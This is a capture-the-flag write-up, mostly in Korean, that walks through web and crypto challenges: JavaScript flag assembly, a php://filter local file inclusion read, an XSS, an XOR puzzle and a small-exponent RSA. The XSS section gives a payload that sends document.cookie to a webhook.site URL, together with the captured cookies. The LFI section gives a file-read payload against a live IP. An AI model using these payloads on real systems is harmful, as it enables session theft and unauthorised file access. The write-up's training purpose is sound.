WEB

Source Viewer

1. 소스보기
document.getElementById('button').onclick = function() {
   alert("That's wrong haha Find more");
    };
    var a = "KCTF";
    var b = "{";
    var c = "THIS_IS_";
    var d = String.fromCharCode(70, 76, 65, 71);
    var e = "}";

2.
a+b+c+d+e = #KCTF{THIS_IS_FLAG}

LFI

1. LFI 구문 삽입
<http://13.209.181.167:40083/?path=php://filter/convert.base64-encode/resource=/var/www/html/flag.php>

2. b64 복호화 
PD9waHAKCWVjaG8gIkhlbGxvIjsKCSRmbGFnID0gIktDVEZ7bGZpX21hc3Rlcn0iOwo/Pg==

3.
<?php
	echo "Hello";
	$flag = "KCTF{lfi_master}";
?>

#KCTF{lfi_master}

EZ_XSS

1. FASTAPI docs 페이지 접속
<http://13.209.181.167:40084/docs> 

2. XSS 구문 삽입
{
  "code": "location.href='<https://webhook.site/7e68ff52-14d4-4b82-b7c2-1c72c5ed6035?'+document.cookie>"
}

3.
<https://webhook.site/7e68ff52-14d4-4b82-b7c2-1c72c5ed6035?AWSALBTG=4a60lENTw3SdHgde8aruvbjm1fOk0XGkow/fLZsOV/g150gp20/csrShORs3JO6bc7TNKbYiegwmyQK0Xv0zNyPPbY2jdJ0r6oeKuu7aX9JfNA0G9TiSR4YyxVlHlzuG66VImJazlgbLGvp/lMN0dlD4AeQ+e3fUxmCyIeFiwKg4eAjQ+Ks=;%20AWSALBTGCORS=4a60lENTw3SdHgde8aruvbjm1fOk0XGkow/fLZsOV/g150gp20/csrShORs3JO6bc7TNKbYiegwmyQK0Xv0zNyPPbY2jdJ0r6oeKuu7aX9JfNA0G9TiSR4YyxVlHlzuG66VImJazlgbLGvp/lMN0dlD4AeQ+e3fUxmCyIeFiwKg4eAjQ+Ks=;%20flag=KCTF{EZ_INJECTION}>

#KCTF{EZ_INJECTION}

Crypto

Thug Life

from pwn import xor
from Crypto.Util.number import *

thug_life = b"Yeah Beyonce Perfect And Rihanna too Kanye's a genius And Drake's so cool All the Kardashian's China and Caitlyn too I want to be famous gonna be famous Just like you"
a = long_to_bytes(0x32573d4b4282e0d37b0347cead9b85d4c72def2293c408e65fe49851b05bb12e965997592c95f36862817439edad63bfe2f480243a78bb2d735424f562fc4a61ac72832f8260ebe283157761084d238399b70eaf9d8c43fd4b962e3f78f25291fe432c21a13917f7ebd273fff7dff18b23de21c231eb49495fc065dbc396c153236a1f262b7f476bcd75d28e8bc14ed0f476ac4c6fe7b733ad41287a505e13a2df9bd0dc33b0)
b = long_to_bytes(0x2071086519b4edc347326dd8d2a195d5d517cd09d1e001eb31f89857b66a9c27d3488a69798eef)
res = xor(xor(b,a),thug_life)
print(res)

#KCTF{thiS_Is_just_A_begiNNing_Cheer_uP}

WarmUp RSA

import gmpy2

cipher = 281827188589453117651587122569600154626922955240619436601295790393278898844588102785245701754162220704995433015679433374002958693

with gmpy2.local_context() as ctx:
    ctx.precision = 3000
    pt = gmpy2.cbrt(cipher)

print('%x' % int(pt)).decode("hex")

#KCTF{Y0u_Ar3_C00L}